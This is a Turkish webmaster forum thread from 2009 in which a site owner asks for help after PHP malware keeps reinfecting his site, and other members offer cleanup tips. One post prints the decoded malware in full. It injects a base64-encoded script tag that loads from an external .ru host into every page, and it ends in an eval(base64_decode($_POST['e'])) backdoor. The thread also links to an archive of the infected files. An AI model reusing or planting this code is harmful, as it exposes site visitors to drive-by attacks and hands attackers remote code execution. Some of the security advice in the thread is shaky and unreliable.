Arkadaslar siteme aksam üzeri bakmak istedigimde , neye ugradigimi sasirdim.....
Sitem acilmiyordu....Ftp servere baglanip kontrol ettigimde daha da sasirdim........
config.php ve index.phpuzantili dosyalarin en üstüne asagidaki kodlar yerlesmis, ve ftp de simdiye kadar olmayan bir dosyaconfig_default.php ;
config ve index.php uzantili dosyalarinin en üstüne yerlesmis olan kod ;
yukarda ki'nin ne oldugu konusunda bilgisi olan arkadas varmi,,nedir bu bir virusmü yoksa saldirimi.. bundan nasil kurtulabilirim, nasil korunabilirim...
Saldırı;
kodu decode ettim açılımı aşağıda;
Pcnizi, sitenizi, sunucunuzu,yedeklerinizi vs vs netopsiyondaki siteye bulaşan virüsler vs. gibi konulara bakarsanız temizlenmesi için fikir edinebilirsiniz.
--------if(!function_exists('lzoo')){function lzoo($s){if(preg_match_all('#<script(.*?)</s>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<41>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</i f r a m e>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3JhZ2Vyby5ydS9yb3NlL2luZGV4di5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function lzoo2($a,$b,$c,$d){global$lzoo1;$s=array();if(function_exists($lzoo1))call_user_func($lzoo1,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='lzoo')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('lzoo');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$lzool=(($a=@set_error_handler('lzoo2'))!='lzoo2')?$a:0;e v a l(base64_decode($_POST['e']));------
Arkadaşım öncelikle geçmiş olsun. Sitene saldırmıyorlar sadece virüs bulaşmış. iki gündür bende bu virüslerle cebelleşiyorum ama sonunda kurtuldum bu virüs bütün .php .html .txt .js uzantılarına bulaşıyor ayrıca images klasörlerine gifimg.php adında bi dosya bırakıyor. Tavsiyem tek tek temizlemeye ugrasma ftp yi komple sil yedeği varsa yedeğini yükle. İframe virüslere karşında sitede birsürü döküman var onlardan yararlanabilirsin Kolay Gelsin
Kayıt: Sep 30, 2007 Mesajlar: 108 Konum: Avusturya
Tarih: 2009-11-14, 04:40:31 Mesaj konusu:
Arkadaslar ikinizede cok tesekkür ediyorum bilgilendirdiginiz icin...
Ikinizinde vermis oldugu bilgiler dogrultusunda bu virusten simdilik kurtulmus gibi görünüyorum....Ne yazikki yedegi almamistim, var olanlari temizlemem gerekti,,,temizleme islemini "Advanced Find and Replace 4 " programi ile yaptim, sonuc güzel, insallah virusten kalinti falan kalmamistir bir yerde....
Bu virus nasil bulasmis olabilir bu konu hakkinda bilgisi olan varmi....Sitede acikmi varda bulasti acaba. Acik varsa bu acigi nasil kapatabilirim?
Korunmanin yollari nelerdir bu viruslardan......Sitemin güvenligini en iyi sekilde nasil alabilirim, örnegin admin.php dosyasini config.php dosyasini nasil saklayabilirim, yada prefix i degistirmem gerekirmi bu viruslardan korunmam icin..
aslında var bilgisayarın güzel bi virus programı yükleyecen kaspersky gibi sonra ftpye heryerden girmeyecen sonra ftpye girerken explorer kullanmayacan cuteftp gibi programlar kullanacan ve gene sonra sitenin her zamn ne olur ne olmaz düşüncesinde yedeğini alacan bu kadar :)
Kayıt: Sep 30, 2007 Mesajlar: 108 Konum: Avusturya
Tarih: 2009-11-14, 06:09:44 Mesaj konusu:
ugurekinci :
ftpye girerken explorer kullanmayacan
cogu zaman bu hatayi yapiyorum...ondan virus bulasmis olabilir...ayni anda, virus programinin Html Script Virus ikazi verdigini biliyorum, demekki olsa olsa ordan girmis ftp ye....
arastirdim tam bir sonuca varamadim, admin.php ve config.php gizlemenin yolu vardir eminim, bunu nasil yapabilecegimiz hakkinda bilgisi olan varmi....
Ftp şifreni mutlaka değiştir. Çoğu zaman temizlemiş olmak yeterli olmaz. Yine bulaşacaktır. Tamamen temizledikten sonra hemen ftp şifreni değiştir. Sorun kalmaz.
Kayıt: Sep 30, 2007 Mesajlar: 108 Konum: Avusturya
Tarih: 2009-11-15, 14:29:05 Mesaj konusu:
Allah rizasi icin biri bana yardim etsin..Sitemi yine ele gecirmis bu virus....Ne yapacagimi bilmiyorum....Bir öncekinde siteyi sifirlamistim temizlemistim virusten..Giris sifrelerimi de degismistim, simdi yine aynisi, sitem gitmis yine...Lütfen biri bana akil versin ALLAH RIZASI icin arkadaslar...Gerekirse siteme ait sifrelerimi de veririm bana yardim edecek olan arkadasa ama biri lütfen yardim etsin bana...............Biri akil versin bana....
Siteye bulasmis olan bu meret hemen hemn bütün uzantilara bulasiyo (php,html,htm,tpl,js,shtml,text, vesaire " ve image klasörlerinde gifimg.php uzantili bir de dosya birakiyor...
bu konuda deneyimli olan bir arkadas bana yardim edermi!.....
bu linkteki dosyada bulasmis olan meret var...http://rapidshare.com/files/307316824/kodlar.rar
bu gün benim sitem yarin sizin siteniz, ben sitemi kurtarmakla ugrasiyorum halen, netopsiyonda az kisiye yardim etmedim, tek bir kisi bile cikip ta elimden tutmuyor...
her koyun kendi bacagindan asilir.....
Önce kendi bilgisayarını virusten temizle. En güncel virus programını kur ve bilgisayarını taarattır. Kaspersky öneririm. Kendi bilgisayarında mutlaka virus vardır ve ftp ye ordan bulaşıyordur. Sonra serveren ile bağlantıya geç. Muhtemelen onlada bir virus programı olsa gerek. Tarattırsınlar ve temizlesinler.
Sonra hemen ftp şifrelerini değiştir. Ve daha sonrada sitenin eksik kısımlarını tamamlarsın.
Kayıt: Sep 30, 2007 Mesajlar: 108 Konum: Avusturya
Tarih: 2009-11-17, 09:18:27 Mesaj konusu:
Elimde yedek olmayisinin cezasini cekiyorum..Sitemden virusu bir türlü cikaramadim, 3 kere temizledim ftp yi. dosyalari inceledim temizledim Advanced Replace programiyla...Ama her seferinde yine virus ikazi aliyorum..Bilgisayarimada format attim..Degisen bir sey yok..Dosyalarin icndeki gizlenmis
Kardeşim aynı dertten bende muzdalibim kaç sefer temizledim hala aynı her temizlemem de farklı bi i f r a m e bulaşıyor. hostu komple sildirdim şimdi dosyaları tekrar atıyorum. Allahtan yedek elimde mevcuttu. Birde benim anlamadıgım bir nokta var site benim pc dede kurulu localhostta peki buraya neden virüs bulaşmıyor. Senin sorununa gelecek olursak çalıştıgın firmayla konuşup 1 hafta önceki yedekleri atabilirsin
Kayıt: Sep 30, 2007 Mesajlar: 108 Konum: Avusturya
Tarih: 2009-11-19, 16:57:16 Mesaj konusu:
defalarca sifirdan kurmama ragmen her seferinde siteme bu php virusu bulasiyor......
e v a l(base64_decode( ile basliyor kodlar...image klasörüne imagegif.php isminde dosya atiyor...
bu konuda bana yardim edecek biri cikarsa ücreti ne ise verecegim...
artik pes etmek üzereyim.1 hafta icinde ftp yi 5 kez temizledim , olmuyor böyle.....Net opsiyon da bu isi cözecek bir arkadas vardir elbette...bu konuda bana yardim edecek biri cikarsa ücreti ne ise verecegim...
1- kurulumdan hemen önce tüm panel şifrelerini değiştirin.
2- Orjinal sürüm dosyalarını tekrar yükleyin
3- Temiz bir tema yükleyin
4- ftp ile kesinlikle siteye bağlanmayın
Muhtemel virüs hostuna da bulaşmıştır. Benim siteye de bulaşmıştı 3 kez sildim temizledim nafile en sonunda hostcumla irtabata geçtim host hesabımı sıldı yeniden açtı. Ve şimdişeytan kulagına kursun
Bence chmod 444 şifre uzun olacak bunlar fasa fiso. Virüse dağ dayanmıyor :)
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız
Arama
Rütbeliler
Profil
Giriş
